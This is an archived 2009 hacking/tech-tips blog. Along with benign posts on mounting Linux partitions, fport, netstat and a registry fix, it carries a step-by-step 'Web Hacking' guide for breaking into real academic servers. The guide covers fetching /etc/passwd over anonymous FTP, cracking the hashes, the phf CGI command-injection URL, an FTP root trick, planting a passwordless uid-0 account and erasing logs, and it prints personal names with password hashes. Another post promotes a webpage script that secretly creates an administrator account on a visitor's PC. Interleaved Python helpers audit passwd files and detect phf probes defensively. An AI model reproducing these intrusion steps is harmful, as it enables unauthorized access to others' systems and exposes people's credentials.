
    Tuesday, November 24, 2009

    Automatically mount your Linux partition in Windows



    Linux drive image
    You can automatically mount your Linux partition in Windows and have read/write functionality with a freeware application called Ext2Fsd. I will take you through the process of mounting your Linux partition using Windows XP.
    After you install Ext2Fsd you need to mount the Linux partition. Mount the Linux partition by opening Command Prompt and typing the following:
    mount 0 1 L:

    Note: the “0” above is a zero.
    If you get a response like the following, the mount worked and you will be able to access your Linux partition in My Computer.
    Mount Linux image
    I will explain the above commands. The mount command is pretty obvious, and mounts your partition. The zero references your hard drive. If you are like most users and only use one hard drive, then you will want to leave the zero. If you use multiple hard drives then you will need to change that number appropriately.




    The 1 following the zero references the specific partition on your hard drive that Linux resides on. If you are like most users, your Linux partition is the first partition on your hard drive (so you can use GRUB by default) and you will not need to change this number. If Linux is your second or third partition, then you will need to change the number appropriately.
    Lastly, the “L:” is just a notation to give your hard drive a letter in My Computer. I like to use L because it “stands” for Linux. You can give your drive whatever letter you like, however, do not choose C because it will freeze your Windows partition (however, no permanent damage will occur).
    Linux bat image


    In order to automatically mount your partition when you log into Windows you will need to create a batch file. Open a file in notepad and type the following command (you can download my batch file if you prefer):
    mount 0 1 L:
    Save the file with the name linuxpartition.bat. Exit Notepad and right-click linuxpartition.bat and create a shortcut. Drag the shortcut into your Startup folder and your Linux partition will be automatically mounted when you start Windows.
    Startup image



    Even I have tried it, and the easiest is the fs-driver.
    Works great. Just install it and there is no need to type anything at all at the command line.


    Monday, November 16, 2009

    Remote User Creation with Admin Rights

    I came across a small trick which will create a user ID with admin privileges on the victim's computer using HTML in Windows.

    The script provided in this article will create a "User ID" on the victim's machine with "administrator" privileges. It is a local system exploit which can be tweaked to exploit systems remotely. The hacker can upload this script to any free web server and then trick its victim into visiting this link. Once the victim visits this malicious link, a user named "warrior" with password "kickass" will be created on the victim's system.

    MalScript: Sample WSH Script to create "User" with "administrator privileges"








    You can also use it on any PC. Just make a page using this code and
    open it on that PC.

    It's really amazing, try it out and reply.


    Monday, November 9, 2009

    fport : Port Scanner



    fport is a creation of Foundstone. For information on how to download it, go to the tools to detect hacking page.
    Download fport to your C:\ drive.
    Here is a picture of what you might see if you had Malware and used fport to see it:


    worm on fport

    The reason fport is superior to netstat is that it not only shows the ports that the worm is attempting to access but also the protocol and the application or malware. Once you know the name of the process you can use Task Manager to shut it off. Some apps/malware run as a system process and can only be deleted in Safe Mode.
    You will need to access the Command Prompt to use fport.
    To get to the Command Prompt go to Start | Run | type "cmd"
    The Command Prompt may automatically put you in your home directory. You'll need to be in the C:\ to use fport (actually, you'll need to be in whatever folder you downloaded fport in).
    Once in the same folder as fport type "fport."
    fport will list network connections and all the applications using them.
    MORE ON FPORT:
    FPort v1.33 - TCP/IP Process to Port Mapper
    Copyright 2000 by Foundstone, Inc.
    http://www.foundstone.com
    Usage:
    /p sort by port
    /a sort by application
    /i sort by pid
    /ap sort by application path


    what process is using a TCP port in Windows



    You may find yourself frequently going to network tools to determine traffic patterns from one server to another; Windows Servers (and earlier versions of Windows OS) can allow you to get that information locally on its connections. You can combine the netstat and tasklist commands to determine what process is using a port on the Windows Server.
    The following command will show what network traffic is in use at the port level:
    Netstat -a -n -o
    The -o parameter will display the associated process identifier (PID) using the port. This command will produce an output similar to what is in Figure 1.
    Figure 1
    With the PIDs listed in the netstat output, you can follow up with the Windows Task Manager (taskmgr.exe) or run a script with a specific PID that is using a port from the previous step. You can then use the tasklist command with the specific PID that corresponds to a port in question. From the previous example, ports 5800 and 5900 are used by PID 1812, so using the tasklist command will show you the process using the ports. Figure 2 shows this query.
    Figure 2
    This identifies VNC as the process using the port. While a quick Google search on ports could possibly obtain the same result, this procedure can be extremely helpful when you’re trying to identify a viral process that may be running on the Windows Server.
    Alternatively, you can use netstat -b, which shows the executable (image name) associated with each port and PID in one step.
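    The join the post performs by hand (netstat for port and PID, tasklist for PID and image name) can be scripted. The following added Python example, which is not part of the original post, parses constructed netstat -a -n -o and tasklist output and reports which image owns each listening port, the same view fport gives. All sample text is constructed; the image name winvnc.exe for PID 1812 is an assumption mirroring the VNC result in the post, and the function names are mine. It handles the two line shapes netstat emits: TCP rows carry a State column, UDP rows do not.

```python
import re
from collections import defaultdict

# Constructed `netstat -a -n -o` output; PID 1812 mirrors the VNC example in the post.
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  TCP    0.0.0.0:5800           0.0.0.0:0              LISTENING       1812
  TCP    0.0.0.0:5900           0.0.0.0:0              LISTENING       1812
  TCP    192.168.1.10:49700     93.184.216.34:443      ESTABLISHED     2412
  TCP    [::]:445               [::]:0                 LISTENING       4
  UDP    0.0.0.0:123            *:*                                    1040
"""

# Constructed `tasklist` output; winvnc.exe for PID 1812 is an assumption.
TASKLIST_SAMPLE = """\
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Services                   0          8 K
System                           4 Services                   0        340 K
svchost.exe                    880 Services                   0      6,120 K
svchost.exe                   1040 Services                   0      2,048 K
winvnc.exe                    1812 Console                    1      4,512 K
firefox.exe                   2412 Console                    1    180,400 K
"""

# TCP lines carry a State column; UDP lines do not, so State is optional.
NETSTAT_LINE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:([A-Z_]+)\s+)?(\d+)\s*$")
# Image names may contain spaces ("System Idle Process"), hence the lazy first group.
TASKLIST_LINE = re.compile(r"^(.+?)\s+(\d+)\s+(\S+)\s+(\d+)\s+([\d,]+ K)\s*$")


def local_port(address):
    """Port number from '0.0.0.0:135' or an IPv6 form such as '[::]:445'."""
    return int(address.rsplit(":", 1)[1])


def parse_netstat(text):
    """Return (proto, local_port, state, pid) tuples; state is '' for UDP."""
    rows = []
    for line in text.splitlines():
        m = NETSTAT_LINE.match(line)
        if m:
            proto, local, _foreign, state, pid = m.groups()
            rows.append((proto, local_port(local), state or "", int(pid)))
    return rows


def parse_tasklist(text):
    """Map PID -> image name from `tasklist` output."""
    images = {}
    for line in text.splitlines():
        m = TASKLIST_LINE.match(line)
        if m:
            images[int(m.group(2))] = m.group(1).strip()
    return images


def ports_by_process(netstat_text, tasklist_text, listening_only=True):
    """fport-style view: PID -> (image name, sorted 'proto/port' strings).

    With listening_only=True, established TCP connections are skipped so the
    result shows only what the host is offering to the network.
    """
    images = parse_tasklist(tasklist_text)
    ports = defaultdict(set)
    for proto, port, state, pid in parse_netstat(netstat_text):
        if listening_only and proto == "TCP" and state != "LISTENING":
            continue
        ports[pid].add(f"{proto}/{port}")
    return {pid: (images.get(pid, "<no such PID in tasklist>"), sorted(p))
            for pid, p in ports.items()}


def process_on_port(netstat_text, tasklist_text, port):
    """The post's question answered directly: which image owns this local port?"""
    for image, port_list in ports_by_process(netstat_text, tasklist_text, False).values():
        if any(entry.endswith(f"/{port}") for entry in port_list):
            return image
    return None


if __name__ == "__main__":
    for pid, (image, port_list) in sorted(ports_by_process(NETSTAT_SAMPLE, TASKLIST_SAMPLE).items()):
        print(f"{pid:>6}  {image:<24} {', '.join(port_list)}")
```

    On a live server the two sample strings would be replaced by the captured output of the two commands. Note that netstat -b, which does this join inside netstat itself, needs an elevated Command Prompt, whereas -a -n -o and tasklist do not.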



    Saturday, November 7, 2009

    Web Hacking An Introduction


    The Introduction on how to hack a website.

    Source: Hackers Library
    First of all you will need an ftp program such as ws_ftp. Use Voyager FTP, downloadable at http://www.windows95.com/; it’s real simple and easy to use, so try it if you haven’t dealt with ftp before. Now once you have the program find an address like http://www.shiga-pc.ac.jp. You can find addresses like this by going to a search engine such as AltaVista or Google and running a search for url:ac.jp; this tells the search engine to give you all the academic addresses in Japan (ac=academic, jp=Japan). You can try this with any country, e.g. url:dk. But for now let’s just focus on the Japanese servers. When you have an address (I would recommend making a list of about 100 and trying them all) go to your ftp program and type in the address, e.g. http://www.shiga-pc.ac.jp. Note: you will have to log in anonymously. You should then get a list of folders on the remote system: usr, pub, etc, dev, bin. See the etc folder? Open it; once opened you should see some files, passwd and group. Open or view the file passwd (this is where the passwords for the system are stored); you should hopefully get something
    that looks like this:

    root:RqX6dqOZsf4BI:0:1:System PRIVILEGED Account,,,:/:/bin/csh
    field:PASSWORD HERE:0:1:Field Service PRIVILEGED Account:/usr/field:/bin/csh
    operator:PASSWORD HERE:0:28:Operator PRIVILEGED Account:/opr:/opr/opser
    ris:Nologin:11:11:Remote Installation Services Account:/usr/adm/ris:/bin/sh
    daemon:*:1:1:Mr Background:/:
    sys:PASSWORD HERE:2:3:Mr Kernel:/usr/sys:
    bin:PASSWORD HERE:3:4:Mr Binary:/bin:

    uucp:Nologin:4:1:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico
    uucpa:Nologin:4:1:uucp adminstrative account:/usr/lib/uucp:
    sso:Nologin:6:7:System Security Officer:/etc/security:
    news:Nologin:8:8:USENET News System:/usr/spool/netnews:
    sccs:PASSWORD HERE:9:10:Source Code Control:/:
    ingres:PASSWORD HERE:267:74:ULTRIX/SQL Administrator:/usr/kits/sql:/bin/csh

    rlembke:n25SO.YgDxqhs:273:15:Roger Lembke,,,:/usr/email/users/rlembke:/bin/csh
    rhuston:ju.FWWOh0cUSM:274:15:Robert Huston,st 304c,386,:/usr/email/users/rhuston:/bin/csh
    jgordon:w4735loqb8F5I:275:15:James.”Tiger” Gordon:/usr/email/users/jgordon:/bin/csh
    lpeery:YIJkAzKSxkz4M:276:15:Larry Peery:/usr/email/users/lpeery:/bin/csh
    nsymes:lSzkVgKhuOWRM:277:15:Nancy Symes:/usr/email/users/nsymes:/bin/csh
    llembke:yDAq2xZgzqmms:278:15:Linda Lembke:/usr/email/users/llembke:/bin/csh
    grees:eb2pQcYI0Q5UI:279:15:Gary Rees:/usr/email/users/grees:/bin/csh
    nreece:NiwrmCHzn5p7A:281:15:Neva Reece:/usr/email/users/nreece:/bin/csh
    delliott:8Q1O1LukmfXfA:283:15:Dan Elliott:/usr/email/users/delliott:/bin/csh

    erobinet:vGufhYNuhkTZ6:284:15:Eric Robinette:/usr/email/users/erobinet:/bin/csh
    mhirsch:0AgYY2.YBLj8Y:285:15:Michael Hirsch:/usr/email/users/mhirsch:/bin/csh
    schristi:yckqD6acrG2OM:289:15:Scott Christianson:/usr/email/users/schristi:/bin/csh
    pdrummon:39MW8ROgoY.T6:294:15:R.Paul Drummond:/usr/email/users/pdrummon:/bin/csh

    dbrown:fmTUonryY2mCE:295:15:Doris Brown:/usr/email/users/dbrown:/bin/csh
    This means you’ve hit the jackpot. In this case you should get a password cracker; download one at http://www.hackersweb.com (go to the hacking toolz section). I would recommend for the beginning hacker to get a password cracker such as Killer Cracker because it’s extremely easy to use. Once you have downloaded Killer Cracker you will need a dictionary file (get one at http://www.hackersweb.com, look in the extra toolz section); dictionary files are better the bigger they are, so I would recommend getting one at around 10 MB or more (basically this is brute-forcing software). Now the passwords from the passwd file off the server you are hacking: you will need to save them to a file and place them in the same directory as Killer Cracker; you will also need to have your dictionary file in the same directory. Now you are ready to go, just run Killer Cracker and tell it the name of the Pwfile (the password file) and the name of the word file (your dictionary file); the valid file will be the file where the output of the password cracker will be put, just give it a name such as crack.txt. Once the cracker is done cracking the password files for you, go to the valid file and take a look; the file should look something like this:

    root:root:0:1:System PRIVILEGED Account,,,:/:/bin/csh

    (remember this is an example). This file says that the username is root
    and the password is root. If the file had been like this:
    root:dumbass:0:1:System PRIVILEGED Account,,,:/:/bin/csh
    (remember again just an example) the login or username would be root and
    the password would be dumbass, well that’s it just ftp to the site using
    the login and password.  Note if you get root type in the following once
    you have logged in:-   echo “myserver::0:0:Test User:/:/bin/csh”>>etc\passwd
    this will allow you to login to the server with 1:myserver so you
    get the admin suspicious when they see people login as root.  Hide yourself
    as much as possible, if you already have a shell then go through that first
    when loggin on, or telnet to the hacked site shell and then re-telnet to the
    hacked shell using the hacked shell, if you see what I mean, so your who
    appears as local host.  Also get some c scripts which delete your presence,
    erases you off logs etc.

    Now if you were not as lucky to get exactly the same password file as shown
    in the example above then maybe you got something like this.

    root:*:0:1:Operator:/:
    ftp:*:53:53:anonymous ftp:/pub:
    t2:*:201:201:Takaoka Tadashi:/pub:

    This means that the passwd file is shadowed, if this is the case then
    welcome to the administrators world of trying to stop hackers, this is
    where you can’t really do anything.  However there is one thing to do:
    sometimes in very rare cases there may be a folder on the remote system
    that can be accessed by an anonymous login called shadowed, shadow, or
    secret if this is the case the password files should be in there,
    congratulations.   If there isn’t a folder like this, and the passwd file
    is shadowed then bad luck, go to the next address on your list.
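    Seen from the administrator's side, the distinction this section draws (a crypt hash in a world-readable passwd file versus a `*`, `x` or Nologin placeholder) is exactly what a passwd audit checks, along with the uid-0 "myserver::0:0" line the earlier `echo ... >> etc\passwd` command would add. The following added Python example, which is not part of the original text, parses passwd(5) lines and reports entries with an exposed hash, an empty password field, a uid of 0 that is not root, or a malformed field count. The sample entries are a constructed mix taken from the listings on this page; the function names are mine.

```python
# Placeholders a passwd file may carry instead of a hash (locked or shadowed accounts).
LOCKED_MARKERS = {"*", "x", "!", "!!", "Nologin", "NP", "*LK*"}

# Constructed sample mixing entries from the listings in this post, plus the
# ":: 0:0" line the post's "echo ... >> etc\passwd" would add and one broken line.
SAMPLE_PASSWD = """\
root:RqX6dqOZsf4BI:0:1:System PRIVILEGED Account,,,:/:/bin/csh
daemon:*:1:1:Mr Background:/:
uucp:Nologin:4:1:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico
ftp:x:53:53:anonymous ftp:/pub:
rlembke:n25SO.YgDxqhs:273:15:Roger Lembke,,,:/usr/email/users/rlembke:/bin/csh
myserver::0:0:Test User:/:/bin/csh
broken line without fields
"""

EXPOSED_HASH = "password hash stored in world-readable passwd (not shadowed)"
EMPTY_PASSWORD = "empty password field: login with no password"
EXTRA_ROOT = "uid 0 account other than root"


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; malformed lines come back with an 'error' key."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"line": lineno, "raw": line,
                            "error": f"expected 7 fields, got {len(fields)}"})
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if not uid.isdigit() or not gid.isdigit():
            entries.append({"line": lineno, "raw": line, "error": "non-numeric uid/gid"})
            continue
        entries.append({"line": lineno, "name": name, "passwd": pw, "uid": int(uid),
                        "gid": int(gid), "gecos": gecos, "home": home, "shell": shell})
    return entries


def audit_passwd(text):
    """Return (user, finding) pairs an administrator would want to act on."""
    findings = []
    for e in parse_passwd(text):
        if "error" in e:
            findings.append((e["raw"], e["error"]))
            continue
        pw = e["passwd"]
        if pw == "":
            findings.append((e["name"], EMPTY_PASSWORD))
        elif pw not in LOCKED_MARKERS:
            findings.append((e["name"], EXPOSED_HASH))
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["name"], EXTRA_ROOT))
    return findings


def is_shadowed(text):
    """True when no well-formed entry carries a real hash (or nothing) in the password field."""
    return all("error" in e or e["passwd"] in LOCKED_MARKERS for e in parse_passwd(text))


if __name__ == "__main__":
    for user, finding in audit_passwd(SAMPLE_PASSWD):
        print(f"{user}: {finding}")
    print("fully shadowed:", is_shadowed(SAMPLE_PASSWD))
```

    The same check run on the second listing in this section (every password field `*`) returns no findings and reports the file as shadowed, which is the state the text calls "the administrator's world".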

    Now that you have tried the first thing as shown above there are a couple
    of other methods you may also want to try one is FTP hacking shown below.

    Go to a dos prompt after you are connected to the internet .
    Type.
    ftp www.victim=the site address
    server will ask for a username press enter
    server will ask for a password press enter
    at the prompt type quote  user ftp
    then type
    quote cwd ~root
    then type
    quote pass ftp

    If you get in make sure you delete the log file they might look at it and
    see that you were on.  Once you get on the passwd file is in etc/passwd so
    type cd etc then type get passwd.  If you have done the above right and the
    server is old you will have root access.  By the way root is the highest
    security status you can have.

    Another good way of getting root or a shell at least is through browser
    hacking.  Again we’ll use Japanese educational servers as our target. To do
    this you will need a browser such as Netscape or Internet Explorer, you
    will also need a telnet program, you can either download a telnet program
    at 
    http://www.windows95.com or use the one that already comes with dos.
    To access the telnet program that comes with dos go to your dos windows and
    type in telnet www.site.com; the site.com stands for the site you want to
    telnet to, it could be anything like 
    www.geidai.ac.jp or www.tulips.tsukuba.ac.jp.  You will also need a cracker program I would recommend using Killer Cracker and applying as above.

    Next thing you do is open your browser and run a search for url:ac.jp ,
    like explained above.  Again I would recommend making a big list of your
    targets.  Now when you have your target’s web address type it in your browser
    and add this to it.

    http://www.tagetgoeshere.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
    or
    http://www.tagetgoeshere.com/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
    To all you out there who are slightly advanced, I know this is the phf
    technique and it is virtually dead, but you’ll be surprised where you can
    use this.

    This technique of finding the password file was first used in November 1996
    on the fbi.gov webpage by a few hackers. It has been patched up by a lot of
    servers, so this won’t work on something like www.nasa.gov or most of the
    www.*.com sites.  But still works on many university servers outside Europe
    and the U.S.

    O.K.  Once the url is entered you will see a number of things:-
    Error 404
    Cgi-bin/phf is not found on this server (the most common one)
    Or
    Warning
    You do not have permission to view cgi-bin/phf?/ on this server
    There are a number of other things the server might say, but the thing you
    want it to say is this:-

    Query Results
    /usr/local/bin/ph -m alias=x /bin/cat /etc/passwd
    root:2hjh34b4hj:0:1:0000-Admin(0000):/:/bin/sh
    daemon:fghfhijyjk:1:1:0000-Admin(0000):/:
    bin:fghfed7tfndgh:2:2:0000-Admin(0000):/usr/bin:/bin/csh
    sys:fdn7:3:3:0000-Admin(0000):/:
    adm:dehf6:4:4:0000-Admin(0000):/var/adm:
    wnn:dfhfnv:5:5:0000-Admin(0000):/var/adm:
    news:detdc:6:6:0000-Admin(0000):/usr/lib/news:
    lp:qwwos:71:8:0000-lp(0000):/usr/spool/lp:
    smtp:cmvof:0:0:mail daemon user:/:
    uucp:lcocbe:5:5:0000-uucp(0000):/usr/lib/uucp:
    nuucp:pelebd:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
    listen:eoend:37:4:Network Admin:/usr/net/nls:
    nobody:ccvjcvj:60001:60001:uid no b

    etc.
    This means you have hit the jackpot!!!
    If you get something similar to this but all lines have something in common
    like the following:-

    Query Results
    /usr/local/bin/ph -m alias=x /bin/cat /etc/passwd
    root:x:0:1:0000-Admin(0000):/:/bin/sh
    daemon:x:1:1:0000-Admin(0000):/:
    bin:x:2:2:0000-Admin(0000):/usr/bin:/bin/csh
    sys:x:3:3:0000-Admin(0000):/:
    adm:x:4:4:0000-Admin(0000):/var/adm:
    wnn:x:5:5:0000-Admin(0000):/var/adm:
    news:x:6:6:0000-Admin(0000):/usr/lib/news:
    lp:x:71:8:0000-lp(0000):/usr/spool/lp:
    smtp:x:0:0:mail daemon user:/:
    uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
    nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
    listen:x:37:4:Network Admin:/usr/net/nls:
    nobody:x:60001:60001:uid no b

    (notice the x) if you don’t know what this means it means the password
    file is shadowed and you cannot work out the passwords for a shadowed
    password file then you’re in bad luck, I would recommend trying the ftp
    hack prior to this for the best results.

    If some but not all logins have a * in them then it’s ok, it’s worth while
    getting the ones which aren’t shadowed, hey a shell is a shell!!!

    If you want to use your newly acquired shells then telnet to the site and
    put in the login and the password (remember you have to crack the password
    file first explained at the top).
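    On the receiving end, the phf requests shown in this section are easy to pick out of a web server's access log: the tell-tale is a request for /cgi-bin/phf (or /cgi/phf) whose query string decodes to contain a newline, which is what the %0a in the URL becomes. The following added Python example, which is not part of the original text, scans Common Log Format lines for that pattern and separates probes the server answered with 404 from injections it answered with 200. All log lines are constructed, and the function names are mine.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed access-log lines in Common Log Format (not a real capture).
ACCESS_LOG = """\
10.0.0.5 - - [07/Nov/2009:10:01:02 +0000] "GET /index.html HTTP/1.0" 200 1043
10.0.0.9 - - [07/Nov/2009:10:01:07 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 212
10.0.0.9 - - [07/Nov/2009:10:01:09 +0000] "GET /cgi/phf?Qalias=x%0A/bin/cat%20/etc/passwd HTTP/1.0" 200 1899
10.0.0.7 - - [07/Nov/2009:10:02:11 +0000] "GET /cgi-bin/search?q=phf+history HTTP/1.0" 200 5120
10.0.0.9 - - [07/Nov/2009:10:02:30 +0000] "GET /cgi-bin/phf?Qalias=jsmith HTTP/1.0" 404 212
"""

# ip ident user [timestamp] "METHOD target protocol" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

PHF_INJECTION = "phf newline injection"
NEWLINE_IN_QUERY = "newline in CGI query"
PHF_REQUEST = "phf request"


def classify(target):
    """Label one request target, or return None if it looks benign."""
    parts = urlsplit(target)
    query = unquote(parts.query)          # %0a / %0A / %0d become real line breaks
    has_newline = "\n" in query or "\r" in query
    if parts.path.endswith("/phf") and has_newline:
        return PHF_INJECTION
    if has_newline:
        return NEWLINE_IN_QUERY            # same trick aimed at some other CGI
    if parts.path.endswith("/phf"):
        return PHF_REQUEST                 # any phf request is worth a look after 1996
    return None


def scan_access_log(text):
    """Return one finding dict per suspicious request, in log order."""
    findings = []
    for line in text.splitlines():
        m = CLF.match(line)
        if not m:
            continue
        ip, timestamp, method, target, status, _size = m.groups()
        label = classify(target)
        if label:
            findings.append({"ip": ip, "time": timestamp, "method": method,
                             "target": target, "status": int(status), "finding": label})
    return findings


def successful_injections(text):
    """Source addresses whose injection attempts the server answered with 200."""
    seen = []
    for f in scan_access_log(text):
        if f["status"] == 200 and "injection" in f["finding"] and f["ip"] not in seen:
            seen.append(f["ip"])
    return seen


if __name__ == "__main__":
    for f in scan_access_log(ACCESS_LOG):
        print(f"{f['ip']:<10} {f['status']} {f['finding']:<24} {f['target']}")
    print("answered with 200:", successful_injections(ACCESS_LOG))
```

    A 404 on the phf path means the server had no such CGI and only records the probe; a 200 on an injection request is the case that needs follow-up, because the body returned may have been the file the attacker asked for.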



    You Can See Hidden Files Even If You Are Affected by a Virus


    Most of us have faced the problem that we cannot ‘view hidden files’: even after selecting the option from the Folder Options menu, when we go back to check we see that it has been mysteriously restored to ‘Do Not Show Hidden Files & Folders’.
    It happens due to a small bug/virus which edits the Registry to create trouble for us.
    Here is how we can solve it:
    Go to Registry Edit
    [Start -> Run -> type "regedit"]
    Browse to :
    “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL”




    and set the value “CheckedValue” to 1.
    Open notepad,
    copy paste the following [between start and stop]:
    // START
    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden]

    "Text"="@shell32.dll,-30499"
    "Type"="group"
    "Bitmap"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,\
    00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,53,00,\
    48,00,45,00,4c,00,4c,00,33,00,32,00,2e,00,64,00,6c,00,6c,00,2c,00,34,00,00,\
    00
    "HelpID"="shell.hlp#51131"

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN]

    "RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
    "Text"="@shell32.dll,-30501"
    "Type"="radio"
    "CheckedValue"=dword:00000002
    "ValueName"="Hidden"
    "DefaultValue"=dword:00000002
    "HKeyRoot"=dword:80000001
    "HelpID"="shell.hlp#51104"

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]

    "RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
    "Text"="@shell32.dll,-30500"
    "Type"="radio"
    "CheckedValue"=dword:00000001
    "ValueName"="Hidden"
    "DefaultValue"=dword:00000002
    "HKeyRoot"=dword:80000001
    "HelpID"="shell.hlp#51105"
    // STOP
    Save it as whatever_u_want.reg
    Double Click on that file to solve the problem,
    it can be carried, mailed or kept as back-up too.
    (The key paths contain no spaces and the quotes must be plain ASCII quotes; if either changed while copying, fix them before importing.)
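    Before importing a .reg file like the one above (or to see exactly what the virus changed in an export of the same keys), it helps to parse it rather than eyeball it. The following added Python example, which is not part of the original post, reads the text .reg format ([key] sections, "name"="string", dword:, and hex(2): values with backslash line continuation) and checks that SHOWALL has CheckedValue 1 and NOHIDDEN has CheckedValue 2, both pointing at the Hidden value. The embedded .reg text is this post's, with the stray spaces removed; the function and constant names are mine.

```python
import re

# The .reg text from this post with the stray spaces removed from the key paths.
HIDDEN_FIX_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden]
"Text"="@shell32.dll,-30499"
"Type"="group"
"Bitmap"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,\
00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,53,00,\
48,00,45,00,4c,00,4c,00,33,00,32,00,2e,00,64,00,6c,00,6c,00,2c,00,34,00,00,\
00
"HelpID"="shell.hlp#51131"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30501"
"Type"="radio"
"CheckedValue"=dword:00000002
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51104"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"
'''

HIDDEN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden"
SHOWALL_KEY = HIDDEN_KEY + r"\SHOWALL"
NOHIDDEN_KEY = HIDDEN_KEY + r"\NOHIDDEN"

# What the two radio buttons must look like for "Show hidden files" to work.
EXPECTED = {
    SHOWALL_KEY: {"CheckedValue": 1, "ValueName": "Hidden", "Type": "radio"},
    NOHIDDEN_KEY: {"CheckedValue": 2, "ValueName": "Hidden", "Type": "radio"},
}

REG_VALUE = re.compile(r'^"([^"]+)"=(.+)$')


def decode_value(rhs):
    """Turn the right-hand side of a .reg value line into a Python value."""
    if rhs.startswith('"') and rhs.endswith('"'):
        return re.sub(r"\\(.)", r"\1", rhs[1:-1])       # unescape \\ and \"
    if rhs.startswith("dword:"):
        return int(rhs[6:], 16)
    if rhs.startswith("hex(2):"):                        # REG_EXPAND_SZ as UTF-16LE bytes
        raw = bytes(int(h, 16) for h in rhs[7:].split(",") if h)
        return raw.decode("utf-16-le").rstrip("\x00")
    raise ValueError(f"unsupported value syntax: {rhs!r}")


def parse_reg(text):
    """Parse .reg text into {key path: {value name: value}}."""
    keys, current, pending = {}, None, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        if line.endswith("\\"):               # hex values continue on the next line
            pending = line[:-1]
            continue
        pending = ""
        if not line or line.startswith("Windows Registry Editor") or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = REG_VALUE.match(line)
        if not m or current is None:
            raise ValueError(f"unparseable line: {line!r}")
        keys[current][m.group(1)] = decode_value(m.group(2))
    return keys


def check_hidden_fix(reg):
    """List every way the parsed keys differ from the working configuration."""
    problems = []
    for key, expected in EXPECTED.items():
        values = reg.get(key)
        if values is None:
            problems.append(f"missing key {key}")
            continue
        for name, want in expected.items():
            if values.get(name) != want:
                problems.append(f"{key}: {name}={values.get(name)!r}, expected {want!r}")
    problems.extend(f"key path contains a space: {key}" for key in reg if " " in key)
    return problems


if __name__ == "__main__":
    print(check_hidden_fix(parse_reg(HIDDEN_FIX_REG)) or "registry text is consistent")
```

    Exporting the Folder\Hidden branch from an affected machine and running it through the same check shows the tampering the post describes: SHOWALL's CheckedValue reads 2 instead of 1, which is why the radio button snaps back.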
